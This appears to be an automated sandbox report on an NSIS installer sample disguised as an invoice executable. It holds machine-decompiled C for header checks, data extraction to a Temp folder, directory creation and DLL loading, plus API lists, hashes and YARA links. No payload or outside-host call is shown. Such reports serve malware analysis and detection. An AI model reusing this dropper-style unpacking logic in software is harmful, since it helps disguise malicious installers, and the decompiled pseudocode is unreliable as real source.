Download Yara Rule

C-Code - Quality: 78%

			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe";
				 *0x7a2f70 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe", 0x400);
				_t89 = E00405C6D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\jones\\Desktop";
				E004060D4("C:\\Users\\jones\\Desktop", _t91);
				E004060D4(0x7ab000, E00405AB3(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x79e124 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					if( *0x7a2f78 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E004032DD( *0x7a2f78 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						if(_t57 == _v24) {
							 *0x7a2f74 = _t94;
							 *0x7a2f7c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a2f80 =  *0x7a2f80 + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C28(0x7a2fa0, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004032DD( *0x792118);
					if(E004032C7( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a2f78) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004032C7(0x78a118, _t90) == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a2f78 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C28( &_v44, 0x78a118, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x792118; // 0x8c00
							 *0x7a3020 =  *0x7a3020 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x7a2f78 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40a194
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x79e124) {
							_v12 = E00406594(_v12, 0x78a118, _t90);
						}
						 *0x792118 =  *0x792118 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00402ea9
0x00402eac
0x00402eaf
0x00402eb2
0x00402eb8
0x00402ec9
0x00402ece
0x00402ee1
0x00402ee6
0x00402ee9
0x00402eef
0x00000000
0x00402ef1
0x00402efc
0x00402f02
0x00402f13
0x00402f1a
0x00402f22
0x00402f27
0x00402f29
0x00403014
0x00403016
0x00403022
0x00000000
0x00000000
0x00403027
0x0040304b
0x00403056
0x00403061
0x00403066
0x00403069
0x0040306a
0x0040306b
0x0040306d
0x00403075
0x0040308c
0x00403094
0x00403099
0x0040309b
0x0040309b
0x004030a3
0x004030a3
0x004030a6
0x004030a7
0x004030a7
0x004030aa
0x004030ac
0x004030ac
0x004030b6
0x004030bc
0x004030ca
0x00000000
0x004030cf
0x00000000
0x00403075
0x0040302f
0x00403041
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f2f
0x00402f34
0x00402f39
0x00402f3d
0x00402f44
0x00402f4b
0x00402f4d
0x00402f4d
0x00402f58
0x00403080
0x00403077
0x00000000
0x00403077
0x00402f65
0x00402fe5
0x00402fe9
0x00402fee
0x00000000
0x00402fe5
0x00402f6e
0x00402f73
0x00402f7b
0x00402fa1
0x00402fa7
0x00402fb0
0x00402fb6
0x00402fbb
0x00402fc1
0x00000000
0x00000000
0x00402fcb
0x00402fd3
0x00402fd6
0x00402fd6
0x00402fdb
0x00402fdd
0x00402fdd
0x00000000
0x00000000
0x00000000
0x00000000
0x00402fcb
0x00402fef
0x00402ff5
0x00403001
0x00403001
0x00403004
0x0040300a
0x0040300a
0x00403012
0x00000000
0x00403012

APIs

GetTickCount.KERNEL32 ref: 00402EB2
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,00000400), ref: 00402ECE

Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405C71
Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93

GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00402F1A
GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050

Strings

Inst, xrefs: 00402F86
C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
soft, xrefs: 00402F8F
C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
Error launching installer, xrefs: 00402EF1
Null, xrefs: 00402F98
"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 00402EA1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1431146922
Opcode ID: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
Instruction ID: e6d4fb369877e8ee952de7074d12315c12307524423d8dbd5c49f4dc18488fa3
Opcode Fuzzy Hash: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
Instruction Fuzzy Hash: 3151D271901208AFDF20AF65DD85B6E7AB8EB04755F10813BF500B22D6D77C9E818B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D8, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x796120;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004032DD( *0x7a2fd8 + _t62);
				}
				if(E004032C7( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E004032C7(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E004032C7(0x792120, _t97) == 0) {
								goto L41;
							}
							_t69 = E00405D14(_a8, 0x792120, _t97); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40b878 =  *0x40b878 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b860 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E004032C7(0x792120, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40b850 = 0x792120;
						 *0x40b854 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40b858 = _t94;
							 *0x40b85c = _v12;
							_t74 = E00406602(0x40b850);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40b858; // 0x798f20
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a3034 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E004051FB(0,  &_v88);
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40b858; // 0x798f20
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E00405D14(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004030e0
0x004030e4
0x004030e7
0x004030ec
0x004030ee
0x004030ee
0x004030f5
0x004030f9
0x004030fe
0x00403100
0x00403100
0x00403107
0x0040310c
0x00403117
0x00403117
0x00403129
0x004032b5
0x004032b5
0x00000000
0x0040312f
0x00403133
0x00403262
0x004032a5
0x004032a7
0x004032a7
0x004032b3
0x004032ba
0x004032bd
0x00000000
0x00000000
0x00000000
0x00000000
0x004032b3
0x00403267
0x00000000
0x00000000
0x00403269
0x0040326c
0x0040326f
0x00403272
0x00403274
0x00403274
0x00403284
0x00000000
0x00000000
0x0040328b
0x00403292
0x0040325c
0x0040325c
0x004032b7
0x004032b7
0x00000000
0x004032b7
0x00403294
0x00403297
0x0040329e
0x00000000
0x00000000
0x00000000
0x004032a0
0x00000000
0x0040326c
0x0040313f
0x00403141
0x00403148
0x00403148
0x0040314f
0x00403155
0x0040315c
0x0040315f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403165
0x00403165
0x00403165
0x0040316d
0x0040316f
0x0040316f
0x00403180
0x00000000
0x00000000
0x00403186
0x00403189
0x0040318f
0x00403195
0x00403195
0x004031a0
0x004031a6
0x004031ab
0x004031b2
0x004031b5
0x00000000
0x00000000
0x004031bb
0x004031c1
0x004031c3
0x004031cc
0x004031ce
0x004031fc
0x00403202
0x0040320b
0x00403210
0x00403210
0x00403215
0x00403250
0x00000000
0x00000000
0x00000000
0x00403217
0x0040321b
0x00403232
0x00403237
0x0040323a
0x0040323d
0x00403240
0x00403244
0x00000000
0x00000000
0x00000000
0x0040324a
0x00403224
0x0040322b
0x00000000
0x00000000
0x0040322d
0x00000000
0x0040322d
0x00403215
0x00403258
0x00000000
0x00403258
0x00000000
0x00403165

APIs

GetTickCount.KERNEL32 ref: 0040313F
GetTickCount.KERNEL32 ref: 004031C3
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004031EC
wsprintfA.USER32 ref: 004031FC

Strings

... %d%%, xrefs: 004031F6
ay, xrefs: 00403100
!y, xrefs: 00403276
!y, xrefs: 00403172

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$wsprintf
String ID: !y$ !y$ ay$... %d%%
API String ID: 551687249-830929277
Opcode ID: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
Instruction ID: a0ed304c84634e1a182b4cedd43d653909124c4238878ead4aa9bd0ee2fb7366
Opcode Fuzzy Hash: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
Instruction Fuzzy Hash: CE516E31800219ABCB10DFA5DA44A9F7BB8EF44756F1481BFE800B72D0C7389F448BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AD9(_t82);
				_push(_t82);
				_t83 = "Call";
				if(_t33 == 0) {
					lstrcatA(E00405A6C(E004060D4(_t83, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E004060D4();
				}
				E004063AF(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406448(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C48(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C6D(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E004051FB(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x7a3008;
						goto L32;
					} else {
						E004060D4(0x40ac08, 0x7a4000);
						E004060D4(0x7a4000, _t83);
						E00406167(_t75, 0x40ac08, _t83, "C:\Users\jones\AppData\Local\Temp\nsb112C.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E004060D4(0x7a4000, 0x40ac08);
						_t62 = E004057F0("C:\Users\jones\AppData\Local\Temp\nsb112C.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a3008 =  &( *0x7a3008->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E004051FB();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E004051FB(0xffffffea,  *(_t85 - 8));
				 *0x7a3034 =  *0x7a3034 + 1;
				_t43 = E004030D8( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x7a3034 =  *0x7a3034 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00406167(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00406167(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E004057F0();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x00401775
0x0040177c
0x00401798
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,007A2760,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1

Part of subcall function 004051FB: lstrlenA.KERNEL32(0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
Part of subcall function 004051FB: lstrcatA.KERNEL32(0079ED48,00403210,00403210,0079ED48,00000000,00798F20,73BCEA30), ref: 00405257
Part of subcall function 004051FB: SetWindowTextA.USER32(0079ED48,0079ED48), ref: 00405269
Part of subcall function 004051FB: SendMessageA.USER32 ref: 0040528F
Part of subcall function 004051FB: SendMessageA.USER32 ref: 004052A9
Part of subcall function 004051FB: SendMessageA.USER32 ref: 004052B7

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll, xrefs: 00401826, 00401842
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll$Call
API String ID: 1941528284-3767458726
Opcode ID: a16e79668f69ef6e1e00014d49a3eeb87ace713cdd2536d95c8b25b96f2ab439
Instruction ID: fd3b8c6ffda923ee712ccabd95e062e364f7e6d0f101aa5c62542bd457b9e8d3
Opcode Fuzzy Hash: a16e79668f69ef6e1e00014d49a3eeb87ace713cdd2536d95c8b25b96f2ab439
Instruction Fuzzy Hash: F841B571900114BACF10BFB5CC45DAF36A9EF45368B20833BF522B50E2CA7C8A519B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056C1, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056C1(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004056cc
0x004056d0
0x004056d3
0x004056d9
0x004056dd
0x004056e1
0x004056e9
0x004056f0
0x004056f6
0x004056fd
0x00405704
0x0040570c
0x0040570e
0x00000000
0x0040570e
0x00405718
0x0040571f
0x00405735
0x00000000
0x00000000
0x00000000
0x00405737
0x0040573b

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
GetLastError.KERNEL32 ref: 00405718
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040572D
GetLastError.KERNEL32 ref: 00405737

Strings

C:\Users\user\Desktop, xrefs: 004056C1
C:\Users\user\AppData\Local\Temp\, xrefs: 004056E7

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2028306314
Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction ID: 68da7140adab9ac89dc439175e59da9b3464284d57dce40cdacedd7e8d7715c7
Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction Fuzzy Hash: E2011671C00219EADF00DFA1C944BEFBBB8EF04354F00403AD944B6290E7B89648DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040646F, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040646F(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x00406486
0x0040648f
0x00406491
0x00406491
0x00406495
0x004064a7
0x004064a1
0x004064a1
0x004064a1
0x004064ab
0x004064bf
0x004064d3
0x004064da

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
wsprintfA.USER32 ref: 004064BF
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3

Strings

%s%s.dll, xrefs: 004064B9
\, xrefs: 00406497
